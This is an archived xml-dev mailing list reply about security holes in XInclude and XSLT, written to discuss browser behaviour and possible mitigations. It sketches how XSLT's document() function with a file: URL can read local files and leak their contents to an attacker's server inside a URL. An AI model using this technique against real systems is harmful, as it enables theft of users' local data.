OASIS Mailing List ArchivesView the OASIS mailing list archive below
or browse/search using MarkMail.


Help: OASIS Mailing Lists Help | MarkMail Help



   Re: [xml-dev] XInclude: security risk 1

[ Lists Home | Date Index | Thread Index ]

>On reflection, I think XInclude's security issues are really just a
>subset of those that browsers have with XSLT, or at least are solvable
>in the same way.  XSLT allows you to fetch data from a local file
>using document("file:///whatever") and even allows you to pass out
>that information as part of a URL in another document() call.

You're right. That does sound like another security hole, and 
possibly worse. It also had not occurred to me that you might 
XInclude a file URL. That opens up some more holes.

>I checked what Mozilla does in this case, and it appears to refuse
>to fetch a file: URL from a document() call in a remote stylesheet.

Which raises the questions:

1. What does IE6 do?
2. What does Mozilla do when faced with an http URL in the document() 
function that points to a host other than the document base?

The XSLT issue is potentially worse because you could use XSLT to 
actually include the contents of the stolen XML document in the URL 
you passed back to the hacker's server. It is somewhat (though far 
from completely) mitigated by the fact that the document() function 
can only point to well-formed XML documents so it can't steal 
absolutely any file or URL.

| Elliotte Rusty Harold | elharo@metalab.unc.edu | Writer/Programmer |
|          XML in a  Nutshell, 2nd Edition (O'Reilly, 2002)          |
|              http://www.cafeconleche.org/books/xian2/              |
|  http://www.amazon.com/exec/obidos/ISBN%3D0596002920/cafeaulaitA/  |
|  Read Cafe au Lait for Java News:  http://www.cafeaulait.org/      |
|  Read Cafe con Leche for XML News: http://www.cafeconleche.org/    |


News | XML in Industry | Calendar | XML Registry
Marketplace | Resources | MyXML.org | Sponsors | Privacy Statement

Copyright 2001 XML.org. This site is hosted by OASIS